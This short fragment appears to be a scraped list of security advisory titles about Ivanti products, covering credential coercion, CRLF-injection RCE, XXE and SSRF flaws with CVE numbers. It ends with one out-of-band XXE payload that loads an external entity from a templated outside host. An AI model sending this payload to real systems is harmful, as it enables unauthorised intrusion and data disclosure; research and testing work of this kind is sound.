Ivanti Endpoint Manager – Multiple Credential Coercion Vulnerabilities
Authenticated RCE via OpenSSL CRLF Injection (CVE-2024-37404)
Ivanti Avalanche - CVE-2024-38653
Impacting versions 6.3.1, 6.4.0 (tested), 6.4.1, and 6.3.4.
Ivanti Endpoint Manager Unauthorized XXE Exploit - CVE-2024-37397
Ivanti Pulse Secure - SSRF Vulnerability
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>